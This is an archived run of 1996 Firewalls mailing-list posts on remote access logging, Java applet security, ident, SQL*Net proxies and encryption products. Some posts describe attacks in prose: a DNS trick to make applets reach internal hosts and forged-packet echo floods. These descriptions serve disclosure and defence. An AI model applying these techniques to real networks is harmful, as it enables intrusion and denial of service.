From firewalls-owner Fri Feb 9 13:56:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA02777 for firewalls-outgoing; Fri, 9 Feb 1996 13:45:36 -0800 (PST) Received: from raptor.racal.com (rdgw.racal.com [205.138.43.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA02772 for ; Fri, 9 Feb 1996 13:45:29 -0800 (PST) Received: from usa.racal.com (usa.racal.com [130.45.201.229]) by raptor.racal.com (8.7.1/8.7.1) with SMTP id QAA18458 for ; Fri, 9 Feb 1996 16:45:18 -0500 (EST) Received: from cc:Mail by usa.racal.com id AA823912856; Fri, 09 Feb 96 15:59:10 EST Date: Fri, 09 Feb 96 15:59:10 EST From: "john welby" Message-Id: <9601098239.AA823912856@usa.racal.com> To: firewalls@greatcircle.com Subject: Subscription Request Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Subscription Request to majordomo@greatcircle.com j_welby@usa.racal.com From firewalls-owner Fri Feb 9 14:42:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA04063 for firewalls-outgoing; Fri, 9 Feb 1996 14:07:12 -0800 (PST) Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA04053 for ; Fri, 9 Feb 1996 14:07:04 -0800 (PST) Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id PAA24495; Fri, 9 Feb 1996 15:59:07 -0600 Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr) id sma024481; Fri Feb 9 15:59:02 1996 Received: from ernie.bridge.com by ignatz.bridge.com with SMTP id AA11629 (5.67b/IDA-1.5); Fri, 9 Feb 1996 16:13:11 -0600 Date: Fri, 9 Feb 1996 16:13:11 -0600 From: Ken Hardy Message-Id: <199602092213.AA11629@ignatz.bridge.com> To: frankw@in.net, Dick_Wall@stratus.com Subject: Re: Non-company Access ?? 
Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

In addition to some of the precautions already mentioned, on the rare occasions that I've had to allow outside access, I've logged _all_ the traffic involved (packet contents as well as headers) to a file on a third machine running tcpdump or snoop. The captured sessions get archived indefinitely, too.

- KH

From firewalls-owner Fri Feb 9 14:51:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA05558 for firewalls-outgoing; Fri, 9 Feb 1996 14:33:45 -0800 (PST) Received: from reach.com (reach.com [199.29.96.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA05542 for ; Fri, 9 Feb 1996 14:33:38 -0800 (PST) Received: from ad0.reach.com ([192.9.208.9]) by reach.com (4.1/SMI-4.1) id AA13107; Fri, 9 Feb 96 17:31:17 EST Date: Fri, 9 Feb 96 17:34:12 EST From: dgameynn@colybrand.com (David Gamey -- ITAS - Toronto ) Received: by ad0.reach.com (4.1/3.2.083191-Reach Networks) id AA14254; Fri, 9 Feb 96 17:34:12 EST Message-Id: <9602092234.AA14254@ad0.reach.com> To: Firewalls@greatcircle.com Subject: Strange Digests? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

To: Firewalls@greatcircle.com Inet

I've been subscribed to the digest for quite a while now. Lately, as in since mid-Dec, I've noticed something unusual in the e-mail messages. I seem to be getting digest postings from different sources:

1. The mail app normally reports digests as being from "owner Internet" but occasionally reports the sender as "digest Internet" (It tends to truncate the sender and append Internet).
2. The digest is incorrectly identified, usually as V01N001, e.g. most recently this occurred on Thursday, Feb. 8
3. I see case changes in the title line, i.e. firewalls-digest instead of Firewalls-digest

I don't think this problem lies with my online service, despite their peculiar gateway, and I suspect others are finding the same thing.
Again, unfortunately, I can't tell much about what's going on as most of the useful features that would tell me have been left out of the mail client. Sorry for the digression.

David

From firewalls-owner Fri Feb 9 14:54:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA05928 for firewalls-outgoing; Fri, 9 Feb 1996 14:40:28 -0800 (PST) Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA05922 for ; Fri, 9 Feb 1996 14:40:23 -0800 (PST) Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id QAA27983 for GreatCircle.COM!firewalls; Fri, 9 Feb 1996 16:30:02 -0600 (CST) Received: by ris1.nmti.com (smail2.5) id AA29450; 9 Feb 96 16:11:49 CST (Fri) Received: by sonic.nmti.com; id AA09982; Fri, 9 Feb 1996 15:42:31 -0600 From: peter@nmti.com (Peter da Silva) Message-Id: <9602092142.AA09982@sonic.nmti.com.nmti.com> Subject: Re: JAVA security problem ? To: jcmurphy@smurfland.cit.buffalo.edu (Jeff Murphy) Date: Fri, 9 Feb 1996 15:42:30 -0600 (CST) Cc: proberts@clark.net, ken@bridge.com, firewalls@GreatCircle.COM In-Reply-To: <199602091940.OAA16654@smurfland.cit.buffalo.edu> from "Jeff Murphy" at Feb 9, 96 02:40:40 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> note: i'm not a java proponent. i really only 'play' with it from time to
> time. but the statements like the following are so vague and general. many
> people say "ohmygawd.. executing code! it's badbadbad!" but never state
> in what ways it is bad.

Last time I found a hole the folks at Sun were very good about patching it up, but it *does* depend on some rather new technology for the basic security mechanism.
From firewalls-owner Fri Feb 9 14:57:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA06281 for firewalls-outgoing; Fri, 9 Feb 1996 14:45:15 -0800 (PST) Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA06233; Fri, 9 Feb 1996 14:44:50 -0800 (PST) Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA26512; Fri, 9 Feb 96 16:45:55 CST Received: by mnbp.network.com with Microsoft Mail id <311BCD79@mnbp.network.com>; Fri, 09 Feb 96 16:40:57 CST From: Michael Brown To: firewalls-owner , Firewall ListServer Subject: RE: NetWare LAN Security using IP-IPX Gateway Date: Fri, 09 Feb 96 16:36:00 CST Message-Id: <311BCD79@mnbp.network.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk check out alt.2600 go to www.yahoo.com and search on 2600 you should pick up a lot of different techniques by watching it for a few days. ---------- From: firewalls-owner To: Firewall ListServer Subject: NetWare LAN Security using IP-IPX Gateway Date: Friday, February 09, 1996 12:41PM I am new to the entire subject of firewalls and am looking for comments on the relative security of IPX-based assets on an IPX only LAN which is connected to an IP network (Internet mainly) via an IP-IPX gateway. Is there a way to access the IPX-based assets from the IP side and do harm? If so, how (either theory or actual methods) and can the risk be further mitigated? This information will be used to assist us in determining the relative risks. Thanks for your time. -Eliot -- Eliot T. 
Ware, CNE voice: (202) 622-1302
Global Systems Architect fax: (202) 622-2582
Department of the Treasury (UNIBAND)
preferred: etware@access.digex.net
alternate: eliot.ware@treas.sprint.com

From firewalls-owner Fri Feb 9 14:59:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA04591 for firewalls-outgoing; Fri, 9 Feb 1996 14:17:07 -0800 (PST) Received: from insosf1.netins.net (insosf1.netins.net [167.142.225.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA04582 for ; Fri, 9 Feb 1996 14:16:58 -0800 (PST) Received: (from kcrg@localhost) by insosf1.netins.net id QAA02365; Fri, 9 Feb 1996 16:16:02 -0600 Received: from picayune.crgazette.com by kcrg.com with SMTP id AA10856 (5.67b/IDA-1.5); Fri, 9 Feb 1996 16:15:10 -0600 Date: Fri, 9 Feb 1996 16:15:08 -0600 (CST) From: Jeff Fisher X-Sender: jeff@picayune.crgazette.com To: Jim Legg Cc: firewalls@GreatCircle.COM Subject: Re: port 113? In-Reply-To: <9602091636.AA25002@sun1plus.liebert.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 9 Feb 1996, Jim Legg wrote:
> Hi,
>
> I noticed in my log files the following (just a snippet):
>
> 2/9-10:42:07-81 tcp 199.18.25.195/3054 -> 206.214.232.100/www 44 syn
>
> When this web site (nslookup returns Facade.COM) is accessed it tries to come
> back to your system on port 113. What is this port? (It's not listed in my
> /etc/services)
>

On my system (Linux) /etc/services says this:

    auth            113/tcp         tap ident authentication

and from /etc/inetd.conf:

    # Ident service is used for net authentication
    auth    stream  tcp     nowait  root    /usr/sbin/in.identd     in.identd

The man page references RFC 1413 if you want to do some more reading, or I can e-mail the man page from my system.
- - ------
Jeff Fisher Gazette MIS jeff@kcrg.com Cedar Rapids, IA, US

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRvHY+tNvqLoDn1tAQHMnAQAnG7LV4jSfKxtJv5kPTsiRQhJJA9zj1jZ
txfAdJS7hBDFNdONsZKQzptzYozqDqYvN2nw2IEpK9FiCbBlCcdH/UhRkVTZG2cO
+OZvLYHBbeXfuqufc9OczlgFDdTASMCm6CK12VfU42F+6QA8r3Hz9A4KMqCjQE/y
beQizZ0ohAk=
=7nue
-----END PGP SIGNATURE-----

From firewalls-owner Fri Feb 9 17:46:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA14413 for firewalls-outgoing; Fri, 9 Feb 1996 17:23:13 -0800 (PST) Received: from mark.allyn.com (mark.allyn.com [198.202.30.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id RAA14408 for ; Fri, 9 Feb 1996 17:23:09 -0800 (PST) Received: (from allyn@localhost) by mark.allyn.com (8.7/8.7) id RAA25941; Fri, 9 Feb 1996 17:25:36 -0800 (PST) From: Mark Allyn (206) 860-9454 Message-Id: <199602100125.RAA25941@mark.allyn.com> Subject: Re: Non-company Access ?? To: ken@bridge.com (Ken Hardy) Date: Fri, 9 Feb 1996 17:25:36 -0800 (PST) Cc: frankw@in.net, Dick_Wall@stratus.com, firewalls@GreatCircle.COM In-Reply-To: <199602092213.AA11629@ignatz.bridge.com> from "Ken Hardy" at Feb 9, 96 04:13:11 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hello!

This can get mighty unwieldy. Where are you going to keep those gigabytes of data?

I tried extensive logging before, but I bagged it. Disk space is not that cheap yet.

About the only thing I could suggest, if your company is as big as mine (Boeing), is to take all of the surplus PC's and rip out their hard disks and install them one at a time in your logging machine, let them fill up, and stash them away. Then pray that the rate that these suckers fill up is slower than the rate that your company surpluses old equipment.

Good Luck!
From firewalls-owner Fri Feb 9 22:24:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id WAA25267 for firewalls-outgoing; Fri, 9 Feb 1996 22:22:26 -0800 (PST) Received: from gxl.woodtech.com (gxl.woodtech.com [204.248.87.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id WAA25262 for ; Fri, 9 Feb 1996 22:22:22 -0800 (PST) Received: (from joey@localhost) by gxl.woodtech.com (8.6.12/8.6.12) id AAA12862; Sat, 10 Feb 1996 00:27:26 -0600 Date: Sat, 10 Feb 1996 00:27:25 -0600 (CST) From: "Joe Smith (Really!)" To: Greg Woods cc: Michael Baumann , jason@OiT.co.uk, brian@ilinx.bctel.net, brian_murrell@bctel.net, firewalls@GreatCircle.COM Subject: Re: anybody know of any vulnerabilities with "echo" In-Reply-To: <199602090250.TAA08588@ncar.ucar.EDU> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

What is the loss of disabling echo? Or discard for that matter.

On Thu, 8 Feb 1996, Greg Woods wrote:
> On Thu, 8 Feb 1996, Jason L. Haar wrote:
> >
> > >I'm wondering if a new vulnerability with the (a particular implementation
> > maybe) echo server has been found. Anybody else notice this trend??
>
> There's a CERT advisory out; forged packets that appear to come from the
> echo port of one host are sent to the echo port of another, causing the
> echo servers to bombard one another. This will hose both machines
> and the net between them, a very effective denial of service attack.
> > --Greg
>

From firewalls-owner Fri Feb 9 22:39:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id WAA26234 for firewalls-outgoing; Fri, 9 Feb 1996 22:34:43 -0800 (PST) Received: from WYVERN.AZTECH.NET (AZTech.Net [198.182.221.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id WAA26191 for ; Fri, 9 Feb 1996 22:34:19 -0800 (PST) Received: by aztech.net (MX V4.0-1 VAX) id 266; Fri, 09 Feb 1996 23:29:07 -700 Date: Fri, 09 Feb 1996 23:29:04 -700 From: Steve Gibbons To: FIREWALLS@GREATCIRCLE.COM CC: _steve@aztech.net Message-ID: <0099DACE.DD817F60.266@aztech.net> Subject: Re: JAVA security problem ? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Various people have posted to this list recently, some of whom asked how Java might be compromised. Enclosed is a message that I sent to one of the Java Developers/Maintainers a few days back. I fully admit that this is unverified and poorly explained, but it's my first stab at the problem and I don't have a machine that will run Java applets... (VMS, ULTRIX, and Macintosh here.) I have not yet received a response (FWIW.)

-- Begin Forwarded Message --

Jim,

In Article: <199602072346.PAA02314@mile.Eng.Sun.COM>, hagen@scndprsn.Eng.Sun.COM (Hagen) wrote:
# Thank you for your bug report.
# For many reasons, I would like to ask if you could submit a working
# example of this problem.

Usually I don't go off half-cocked, but in this case I don't have the necessary resources to provide a working exploit.

# Based on the bug report you've submitted I'm unsure where to start or
# exactly what the 'coercion' would be. If you can submit a detailed
# description of this problem, I would be very interested in exploring it
# further, but a coded example from you would likely be the most
# expedient method to determine the answer to your question.
The applet itself would probably look very similar to the one at http://www.javasoft.com/sfaq/example/sendTest.java with changes to how the variable 'in' gets assigned a value, or (maybe) to the new DatagramPacket call so that packets are sent to in[1] instead of in[0].

Assume the person instigating the attack has a machine that is running both an HTTP server and a DNS server. Normally, this machine is accessed from the outside as www.foo.com, and DNS behaves normally. When, for example, the DNS server receives a request to supply address RRs for trigger.foo.com it does something else: it looks at where the request came from and constructs a response with multiple address RRs - the first of which is www.foo.com's real address and the rest of which are addresses within victim.bar.com's network (for example).

Assume that the HTTP server is similarly jimmied so that when it serves a particular file it can modify it to suit the target. (I'm not certain that this is necessary.)

This should be testable without hacking on server code by configuring www.foo.com with one A RR, trigger.foo.com with two A RRs (the first of which is the same as that of www.foo.com, the second of which is the target) and then creating an applet that can connect to any interface of a multi-homed host.

# Again, thank you very much for your help,

I hope that it did help, and that my explanation was clear enough. If I could run applets on any of my machines, I'd take a stab at it myself. Again, this is purely a WAG on my part, and I hope that I haven't wasted your time.

# _____Begin Bug Report_____
# Greetings,
# I believe that it might be possible to coerce a downloaded applet into making
# TCP/IP connections to machines other than the serving site. It's my
# understanding that such connections are supposed to be disallowed.
# I don't have proof that this is the case, but my gut feeling based on looking
# at your API guides and years of programming tells me that this is so.
# The exploit requires control of a DNS server and changing the response to name
# to address queries on the fly.
# Feel free to contact me if you need more details.
# I would appreciate knowing whether my suspicion is correct (or not.)
# --
# Steve@AZTech.Net
# +1 602 504 2246 (days)
# +1 602 867 8777 (home)

--
Steve@AZTech.Net

From firewalls-owner Fri Feb 9 23:39:19 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA29162 for firewalls-outgoing; Fri, 9 Feb 1996 23:26:49 -0800 (PST)
Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA29157 for ; Fri, 9 Feb 1996 23:26:45 -0800 (PST)
Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id CAA16624; Sat, 10 Feb 1996 02:23:18 -0500
Date: Sat, 10 Feb 1996 02:23:14 -0500 (EST)
From: Rabid Wombat
To: "Mark Allyn (206) 860-9454"
cc: Ken Hardy , frankw@in.net, Dick_Wall@stratus.com, firewalls@GreatCircle.COM
Subject: Re: Non-company Access ??
In-Reply-To: <199602100125.RAA25941@mark.allyn.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Just leave a week/month (whatever you have room for) on line, and back it up to tape with your daily backups. You can always restore the old log file from tape if you have the need.

----------------------------------------
Rabid Wombat wombat@mcfeely.bsfs.org
----------------------------------------

On Fri, 9 Feb 1996, Mark Allyn (206) 860-9454 wrote:

> Hello!
>
> This can get mightily unwieldy. Where are you going to keep those
> gigabytes of data?
>
> I tried extensive logging before, but I bagged it. Disk space is
> not that cheap yet.
>
> About the only thing I could suggest, if your company is as big
> as mine (Boeing), is to take all of the surplus PC's and rip out
> their hard disks and install them one at a time in your logging machine,
> let them fill up, and stash them away. Then pray that the rate that
> these suckers fill up is slower than the rate that your company
> surpluses old equipment.
>
> Good Luck!
>

From firewalls-owner Sat Feb 10 01:24:12 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id AAA02554 for firewalls-outgoing; Sat, 10 Feb 1996 00:59:50 -0800 (PST)
Received: from hawk.hcsc.com (hawk.hcsc.com [204.5.22.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA02546 for ; Sat, 10 Feb 1996 00:59:44 -0800 (PST)
Received: from london.hcsc.com by hawk.hcsc.com (5.61/harris-5.1) id AA10386; Sat, 10 Feb 96 03:58:58 -0500
Received: by london.csd.harris.com (5.61/HARRIS-4.0) id AA15194; Sat, 10 Feb 96 08:59:00 GMT
From: jon@london.hcsc.com (Jon Shallow)
Message-Id: <9602100859.AA15194@london.csd.harris.com>
Subject: Re: Product selection
To: peter@nmti.com
Date: Sat, 10 Feb 96 8:58:59 GMT
Cc: firewalls@GreatCircle.com
In-Reply-To: <9602091936.AA28623@sonic.nmti.com.nmti.com>; from "Peter da Silva" at Feb 9, 96 1:36 pm
X-Mailer: ELM [version 2.2 PL10]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> >From firewalls-owner Sat Feb 10 02:09:45 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA06823 for firewalls-outgoing; Sat, 10 Feb 1996 02:04:12 -0800 (PST)
Received: from icicle.winternet.com (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id CAA06818 for ; Sat, 10 Feb 1996 02:04:02 -0800 (PST)
Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle.winternet.com (8.7.3/8.7.2) with ESMTP id EAA10620; Sat, 10 Feb 1996 04:03:16 -0600 (CST)
Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id EAA14104; Sat, 10 Feb 1996 04:03:15 -0600
Posted-Date: Sat, 10 Feb 1996 04:03:15 -0600
Date: Sat, 10 Feb 1996 04:03:14 -0600 (CST)
From: Ron DuFresne
To: Jim Legg
cc: firewalls@GreatCircle.COM
Subject: Re: port 113?
In-Reply-To: <9602091636.AA25002@sun1plus.liebert.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 9 Feb 1996, Jim Legg wrote:

> Hi,
>
> I noticed in my log files the following (just a snippet):
>
> 2/9-10:42:07-81 tcp 199.18.25.195/3054 -> 206.214.232.100/www 44 syn
> 2/9-10:42:08-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
> 2/9-10:42:11-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
> 2/9-10:42:17-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
> 2/9-10:42:29-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
> 2/9-10:42:53-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
> 2/9-10:42:55-81 tcp 199.18.25.195/3055 -> 206.214.232.100/www 44 syn
> 2/9-10:42:55-81 tcp 199.18.25.195/3056 -> 206.214.232.100/www 44 syn
> 2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64)
> 2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64)
> 2/9-10:42:58-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64)
> 2/9-10:42:59-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64)
> 2/9-10:43:04-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64)
> 2/9-10:43:05-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64)
>
> When this web site (nslookup returns Facade.COM) is accessed it tries to come
> back to your system on port 113. What is this port? (It's not listed in my
> /etc/services)

ident           113/tcp         auth tap        # identd

Later,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity.
It eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart

***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.

From firewalls-owner Sat Feb 10 05:39:29 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA12593 for firewalls-outgoing; Sat, 10 Feb 1996 05:29:25 -0800 (PST)
Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA12588 for ; Sat, 10 Feb 1996 05:29:21 -0800 (PST)
Received: from maestro.Maestro.COM by relay3.UU.NET with SMTP id QQachx22534; Sat, 10 Feb 1996 08:28:38 -0500 (EST)
Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA02963; Sat, 10 Feb 96 08:17:58 EST
Date: Sat, 10 Feb 1996 08:17:58 -0500 (EST)
From: Sick Puppy
To: firewalls@GreatCircle.com
Subject: Re: SickPuppyChow 1-96, Part One
In-Reply-To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Sat, 10 Feb 1996, R. M. DuFresne wrote:

> You're aware that none of these URL's are correct aren't you?

Looks like they got garbled going through the list.
Will repost URL'S

SP, tCED cDm

From firewalls-owner Sat Feb 10 06:55:15 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA14712 for firewalls-outgoing; Sat, 10 Feb 1996 06:48:46 -0800 (PST)
Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA14707 for ; Sat, 10 Feb 1996 06:48:42 -0800 (PST)
Received: from East.Sun.COM by mercury.Sun.COM (Sun.COM) id GAA06124; Sat, 10 Feb 1996 06:47:59 -0800
Received: from congress.East.Sun.COM by East.Sun.COM (5.x/SMI-5.3) id AA00076; Sat, 10 Feb 1996 09:47:55 -0500
Received: from traveller.East.Sun.COM by congress.East.Sun.COM (4.1/SMI-4.1) id AA27831; Sat, 10 Feb 96 09:47:52 EST
Received: by traveller.East.Sun.COM (SMI-8.6/SMI-SVR4) id JAA05563; Sat, 10 Feb 1996 09:47:53 -0500
From: giff@congress.East.Sun.COM (Wayne Gifford - Internet Commerce Group)
Message-Id: <199602101447.JAA05563@traveller.East.Sun.COM>
Subject: Re: Non-company Access ??
To: firewalls@greatcircle.com
Date: Sat, 10 Feb 1996 09:47:53 -0500 (EST)
In-Reply-To: from "firewalls-owner@GreatCircle.COM" at Feb 8, 96 05:27:26 pm
X-Mailer: ELM [version 2.4 PL21]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> In a few words .. can anyone tell me how your companies handle requests
> for third party access to your networks ?
>
> I get frequent requests to provide PPP or SLIP access to contractors,
> vendors, resellers, distributors, etc. for the purpose of accessing all
> sorts of applications and data bases. I also get requests to "open a
> hole in the firewall" to allow these folks to access our facilities.
>

Look into SKIP (Simple Key management for Internet Protocols), a draft Internet spec for doing just this sort of thing.
Look at http://skip.incog.com for source and a Solaris implementation

giff

From firewalls-owner Sat Feb 10 07:09:25 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA14852 for firewalls-outgoing; Sat, 10 Feb 1996 06:58:09 -0800 (PST)
Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA14847 for ; Sat, 10 Feb 1996 06:58:05 -0800 (PST)
Date: Sat, 10 Feb 1996 9:57:20 -0500 (EST)
From: "A. Padgett Peterson, P.E. Information Security"
To: firewalls@greatcircle.com
Message-Id: <960210095720.20214ab9@hobbes.orl.mmc.com>
Subject: Dead end concepts
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>1. Encryption-You have a user friendly screen to select the drive, directory
>and files that you want to encrypt. Chosen files for encryption are
>grouped together and compiled into a single executable file with an assigned
>password you enter. There is no limitation on the password size. Overseas
>distribution of the encrypted files is not restricted. File encryption
>often takes less than ten seconds.

Give me a break. Why is it that everyone and their uncle wants to do individual file encryption? I have and use ViaCrypt's PGP for that and the Business Edition has a lot more advantages.

>2. Decryption- Allows you to select the drive, directory and file you want
>to decrypt. The password is requested once you select the encrypted file.
>Decryption is performed in Windows or Windows 95 with the freely distributed
> decryption module. Decryption module is sent to each receiver with no
>licensing requirement. Decryption of the executable file may also be
>performed at the DOS prompt with no additional software.

Understand. This is a way to end-run ITAR. But ITAR is going away so why bother? Now why do I say it is going away?
Look at ITAR section XIII (b) exclusions and the MasterCard/Visa/Microsoft/Netscape alliance (exercise is left to the student 8*). If you want evidence of the size of the market, look at AT&T's waiver of the traditional $50 cardholder liability on WorldNet.

Further, corporations and big users do not need to encrypt individual files for the most part; they need to encrypt channels (to avoid volume analysis) between their sites and the entire notebook/computer, not some files. Heck, corporate users have trouble understanding when to run and not to run macros in WORD documents and you expect them to be diligent about what files to encrypt before mailing?

Just as we had to move protection from the workstation/node level to the network/subnet (e.g. firewalls), transaction protection must also be moved. I am seeing a lot of whole keys on blue backgrounds these days...

Warmly,
Padgett

From firewalls-owner Sat Feb 10 07:57:24 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA16393 for firewalls-outgoing; Sat, 10 Feb 1996 07:45:06 -0800 (PST)
Received: from cais.cais.com (cais.com [199.0.216.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA16387 for ; Sat, 10 Feb 1996 07:45:02 -0800 (PST)
Received: from [198.69.129.16] (fwoyach.cais.com [198.69.129.16]) by cais.cais.com (8.6.10/8.6.5) with SMTP id KAA25644 for ; Sat, 10 Feb 1996 10:44:13 -0500
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sat, 10 Feb 1996 10:43:48 -0500
To: Firewalls@GreatCircle.COM
From: fwoyach@cais.cais.com (Frederick Woyach)
Subject: Re: SQL*Net proxy?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
>From: gary flynn
>Date: Tue, 6 Feb 1996 12:40:27 -0500
>Subject: Re: SQL*Net proxy?
>
>> Has anyone successfully configured a proxy for outbound/inbound SQL*Net
>> transactions?
>>
>> In my observations, Unix to Unix server communications take place on a
>> designated port, but PC to Unix communications switch port numbers after
>> about 20-25 packets.
>>
>> The PC always sends to the designated port, but the Unix server changes
>> to a different port. This makes filtering difficult.
>>
>
>Oracle servers that are configured as multithreaded will use dynamic
>ports. Several firewall vendors are working with Oracle to develop
>a SQLnet proxy. I don't know the timeframe.
>

I haven't spoken to all 7 vendors Oracle says they are working with but by telephone: TIS says approximately the end of the first quarter. Raptor says about the end of the 2nd quarter.

In the meantime, I believe these are based in part on the Oracle Multiprotocol Interchange product. Which is expensive and brittle as a firewall proxy, so you might want to wait.

Also, you might see an old bug requiring a server dedicated line in the client tnsname.ora file:

    "(CONNECT_DATA = (SID =demo) (server=dedicated)"

where SID is the database identifier.

BTW, I am also looking into using the Sybase Audit server as a firewall proxy. Does anyone have any info/experience on this?

Frederick Woyach                            It's never too late
Senior Staff Eng.                           to have a happy
Lockheed Martin                             childhood!
voice message: (703) 264-6400
ext 2642246 (it's my mailbox)
Email: fwoyach@aol.com fwoyach@cais.com

From firewalls-owner Sat Feb 10 08:24:45 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA17573 for firewalls-outgoing; Sat, 10 Feb 1996 08:10:59 -0800 (PST)
Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id IAA17566 for ; Sat, 10 Feb 1996 08:10:54 -0800 (PST)
